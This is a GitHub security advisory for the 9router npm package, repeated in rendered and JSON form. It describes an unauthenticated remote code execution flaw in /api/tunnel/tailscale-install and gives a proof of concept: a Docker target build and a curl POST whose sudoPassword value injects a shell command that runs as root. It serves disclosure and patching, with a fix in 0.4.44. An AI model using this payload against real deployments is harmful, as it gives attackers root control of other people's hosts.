GHSA-G6G7-PVMX-M74P
Vulnerability from github – Published: 2026-07-02 20:17 – Updated: 2026-07-07 18:35Unauthenticated RCE via /api/tunnel/tailscale-install
Affected: 9router (npm package) — current master (v0.4.39).
Summary
POST /api/tunnel/tailscale-install accepts a JSON body with a sudoPassword field and pipes it, followed by the body of https://tailscale.com/install.sh, into a child process spawned as sudo -S sh. The route is not present in the dashboard middleware matcher in src/proxy.js, so the request reaches the handler without invoking dashboardGuard.proxy(). In deployments where the Node process runs as root (Docker images derived from node:* without a USER directive, npm i -g 9router invoked as root, or systemd units without User=), the spawned sh runs as root and executes the attacker-supplied bytes.
Details
1. Middleware matcher (src/proxy.js:3-15)
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
"/api/cli-tools/:path*",
"/api/mcp/:path*",
],
};
Next.js invokes the middleware only for paths matching this list. Routes that are not listed — including the entire /api/tunnel/* family — do not invoke dashboardGuard.proxy(). No cookie, JWT, CLI token, or Host-header check is applied to them.
2. Route handler (src/app/api/tunnel/tailscale-install/route.js:18-67)
export async function POST(request) {
const body = await request.json().catch(() => ({}));
...
const sudoPassword =
body.sudoPassword || getCachedPassword() || await loadEncryptedPassword() || "";
...
const result = await installTailscale(sudoPassword, shortId, (msg) => {
send("progress", { message: msg });
});
...
}
body.sudoPassword comes from the request body and is passed to installTailscale, which dispatches to installTailscaleLinux on Linux.
3. Linux installation routine (src/lib/tunnel/tailscale.js:304-341)
async function installTailscaleLinux(sudoPassword, log) {
log("Downloading install script...");
return new Promise((resolve, reject) => {
const curlChild = spawn("curl", ["-fsSL", "https://tailscale.com/install.sh"], { ... });
let scriptContent = "";
curlChild.stdout.on("data", (d) => { scriptContent += d.toString(); });
curlChild.on("exit", (code) => {
if (code !== 0) return reject(...);
log("Running install script...");
const child = spawn("sudo", ["-S", "sh"], { stdio: ["pipe", "pipe", "pipe"], windowsHide: true });
...
child.stdin.write(`${sudoPassword}\n`); // ← from request body
child.stdin.write(scriptContent);
child.stdin.end();
});
});
}
The byte stream sent to the stdin of the sudo -S sh child process is:
<sudoPassword from request body>\n
<https://tailscale.com/install.sh body>
When the caller is already root, has NOPASSWD configured for the user, or has a recent sudo timestamp cache, sudo -S sh does not read stdin for a password — it execs sh directly. The new sh process inherits the stdin pipe and reads it line by line:
- The
sudoPasswordvalue from the request — interpreted as the first shell command. - The
install.shbody — interpreted as subsequent shell input.
Appending ; exit 0 to the sudoPassword value causes sh to exit before the legitimate install.sh body runs. The host executes only the request-supplied bytes, as the 9router process user.
Both "Docker container running as root" and "npm i -g 9router on a host with NOPASSWD sudo" reach this path.
PoC
The reproduction below is self-contained: build a representative target image (Node process running as root, with sudo and curl on PATH), start it, send one unauthenticated POST with curl, and read the file written by the payload.
Step 1 — build the target image
docker build -t 9router-vuln-root - <<'EOF'
FROM node:22-bookworm-slim
RUN apt-get update && apt-get install -y --no-install-recommends \
sudo curl ca-certificates \
&& rm -rf /var/lib/apt/lists/*
RUN npm install -g 9router@0.4.39
EXPOSE 20128
CMD ["9router"]
EOF
Step 2 — start the target
docker run -d --rm --name target -p 127.0.0.1:20129:20128 \
9router-vuln-root 9router --log --skip-update
until curl -fs -o /dev/null http://127.0.0.1:20129/api/health; do sleep 1; done
Step 3 — exploit (one unauthenticated POST)
curl -sN -X POST http://127.0.0.1:20129/api/tunnel/tailscale-install \
-H 'Content-Type: application/json' \
-d '{"sudoPassword":"id > /tmp/pwned.txt; exit 0"}'
Step 4 — verify
docker exec target cat /tmp/pwned.txt
# uid=0(root) gid=0(root) groups=0(root)
The trailing "Tailscale not installed" line is a consequence of ; exit 0 terminating sh before the legitimate install.sh body executed; the id > /tmp/pwned.txt write completed earlier in the same sh invocation. The POST carried no credentials, cookies, or prior state.
Impact
Type: Improper Access Control + OS Command Injection (CWE-862 + CWE-78).
Affected operators: 9router operators on Linux/macOS whose deployment matches one of the following configurations:
| Configuration | Example | Outcome |
|---|---|---|
| Node process runs as root | Custom Dockerfile without USER, systemd unit without User=, sudo npm i -g 9router && sudo 9router |
Unauthenticated remote root RCE (primary case in this report) |
Node process runs as a normal user with NOPASSWD sudo |
Developer laptop, CI runner, or single-tenant VPS where the operator's user has NOPASSWD: ALL |
Unauthenticated remote RCE as the operator's user; root reachable via sudo from the foothold |
Node process runs as a normal user without NOPASSWD and no stored password |
Hardened multi-user host | The spawn runs but sudo rejects the supplied value. No RCE; the request still triggers an outbound fetch from tailscale.com and the SSE error stream reveals platform information |
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "9router"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.4.44"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-59800"
],
"database_specific": {
"cwe_ids": [
"CWE-78",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-02T20:17:56Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "# Unauthenticated RCE via `/api/tunnel/tailscale-install`\n\n**Affected:** `9router` (npm package) \u2014 current master (`v0.4.39`).\n\n### Summary\n\n`POST /api/tunnel/tailscale-install` accepts a JSON body with a `sudoPassword` field and pipes it, followed by the body of `https://tailscale.com/install.sh`, into a child process spawned as `sudo -S sh`. The route is not present in the dashboard middleware matcher in `src/proxy.js`, so the request reaches the handler without invoking `dashboardGuard.proxy()`. In deployments where the Node process runs as root (Docker images derived from `node:*` without a `USER` directive, `npm i -g 9router` invoked as root, or `systemd` units without `User=`), the spawned `sh` runs as root and executes the attacker-supplied bytes.\n\n### Details\n\n#### 1. Middleware matcher (`src/proxy.js:3-15`)\n\n```js\nexport const config = {\n matcher: [\n \"/\",\n \"/dashboard/:path*\",\n \"/api/shutdown\",\n \"/api/settings/:path*\",\n \"/api/keys\",\n \"/api/keys/:path*\",\n \"/api/providers/client\",\n \"/api/provider-nodes/validate\",\n \"/api/cli-tools/:path*\",\n \"/api/mcp/:path*\",\n ],\n};\n```\n\nNext.js invokes the middleware only for paths matching this list. Routes that are not listed \u2014 including the entire `/api/tunnel/*` family \u2014 do not invoke `dashboardGuard.proxy()`. No cookie, JWT, CLI token, or `Host`-header check is applied to them.\n\n#### 2. Route handler (`src/app/api/tunnel/tailscale-install/route.js:18-67`)\n\n```js\nexport async function POST(request) {\n const body = await request.json().catch(() =\u003e ({}));\n ...\n const sudoPassword =\n body.sudoPassword || getCachedPassword() || await loadEncryptedPassword() || \"\";\n ...\n const result = await installTailscale(sudoPassword, shortId, (msg) =\u003e {\n send(\"progress\", { message: msg });\n });\n ...\n}\n```\n\n`body.sudoPassword` comes from the request body and is passed to `installTailscale`, which dispatches to `installTailscaleLinux` on Linux.\n\n#### 3. Linux installation routine (`src/lib/tunnel/tailscale.js:304-341`)\n\n```js\nasync function installTailscaleLinux(sudoPassword, log) {\n log(\"Downloading install script...\");\n return new Promise((resolve, reject) =\u003e {\n const curlChild = spawn(\"curl\", [\"-fsSL\", \"https://tailscale.com/install.sh\"], { ... });\n let scriptContent = \"\";\n curlChild.stdout.on(\"data\", (d) =\u003e { scriptContent += d.toString(); });\n curlChild.on(\"exit\", (code) =\u003e {\n if (code !== 0) return reject(...);\n log(\"Running install script...\");\n const child = spawn(\"sudo\", [\"-S\", \"sh\"], { stdio: [\"pipe\", \"pipe\", \"pipe\"], windowsHide: true });\n ...\n child.stdin.write(`${sudoPassword}\\n`); // \u2190 from request body\n child.stdin.write(scriptContent);\n child.stdin.end();\n });\n });\n}\n```\n\nThe byte stream sent to the stdin of the `sudo -S sh` child process is:\n\n```\n\u003csudoPassword from request body\u003e\\n\n\u003chttps://tailscale.com/install.sh body\u003e\n```\n\nWhen the caller is already root, has `NOPASSWD` configured for the user, or has a recent sudo timestamp cache, `sudo -S sh` does not read stdin for a password \u2014 it `exec`s `sh` directly. The new `sh` process inherits the stdin pipe and reads it line by line:\n\n1. The `sudoPassword` value from the request \u2014 interpreted as the first shell command.\n2. The `install.sh` body \u2014 interpreted as subsequent shell input.\n\nAppending `; exit 0` to the `sudoPassword` value causes `sh` to exit before the legitimate `install.sh` body runs. The host executes only the request-supplied bytes, as the 9router process user.\n\nBoth \"Docker container running as root\" and \"`npm i -g 9router` on a host with `NOPASSWD` sudo\" reach this path.\n\n### PoC\n\nThe reproduction below is self-contained: build a representative target image (Node process running as root, with `sudo` and `curl` on `PATH`), start it, send one unauthenticated POST with `curl`, and read the file written by the payload.\n\n**Step 1 \u2014 build the target image**\n\n```sh\ndocker build -t 9router-vuln-root - \u003c\u003c\u0027EOF\u0027\nFROM node:22-bookworm-slim\nRUN apt-get update \u0026\u0026 apt-get install -y --no-install-recommends \\\n sudo curl ca-certificates \\\n \u0026\u0026 rm -rf /var/lib/apt/lists/*\nRUN npm install -g 9router@0.4.39\nEXPOSE 20128\nCMD [\"9router\"]\nEOF\n```\n\n**Step 2 \u2014 start the target**\n\n```sh\ndocker run -d --rm --name target -p 127.0.0.1:20129:20128 \\\n 9router-vuln-root 9router --log --skip-update\nuntil curl -fs -o /dev/null http://127.0.0.1:20129/api/health; do sleep 1; done\n```\n\n**Step 3 \u2014 exploit (one unauthenticated POST)**\n\n```sh\ncurl -sN -X POST http://127.0.0.1:20129/api/tunnel/tailscale-install \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"sudoPassword\":\"id \u003e /tmp/pwned.txt; exit 0\"}\u0027\n```\n\n**Step 4 \u2014 verify**\n\n```sh\ndocker exec target cat /tmp/pwned.txt\n# uid=0(root) gid=0(root) groups=0(root)\n```\n\nThe trailing `\"Tailscale not installed\"` line is a consequence of `; exit 0` terminating `sh` before the legitimate `install.sh` body executed; the `id \u003e /tmp/pwned.txt` write completed earlier in the same `sh` invocation. The POST carried no credentials, cookies, or prior state.\n\n### Impact\n\n**Type:** Improper Access Control + OS Command Injection (CWE-862 + CWE-78).\n\n**Affected operators:** 9router operators on Linux/macOS whose deployment matches one of the following configurations:\n\n| Configuration | Example | Outcome |\n|---|---|---|\n| Node process runs as root | Custom `Dockerfile` without `USER`, `systemd` unit without `User=`, `sudo npm i -g 9router \u0026\u0026 sudo 9router` | Unauthenticated remote root RCE (primary case in this report) |\n| Node process runs as a normal user with `NOPASSWD` sudo | Developer laptop, CI runner, or single-tenant VPS where the operator\u0027s user has `NOPASSWD: ALL` | Unauthenticated remote RCE as the operator\u0027s user; root reachable via `sudo` from the foothold |\n| Node process runs as a normal user without `NOPASSWD` and no stored password | Hardened multi-user host | The spawn runs but `sudo` rejects the supplied value. No RCE; the request still triggers an outbound fetch from `tailscale.com` and the SSE error stream reveals platform information |",
"id": "GHSA-g6g7-pvmx-m74p",
"modified": "2026-07-07T18:35:34Z",
"published": "2026-07-02T20:17:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/decolua/9router/security/advisories/GHSA-g6g7-pvmx-m74p"
},
{
"type": "PACKAGE",
"url": "https://github.com/decolua/9router"
},
{
"type": "WEB",
"url": "https://github.com/decolua/9router/releases?q=0.4.44\u0026expanded=true"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "9router: Missing Authorization and OS Command Injection"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.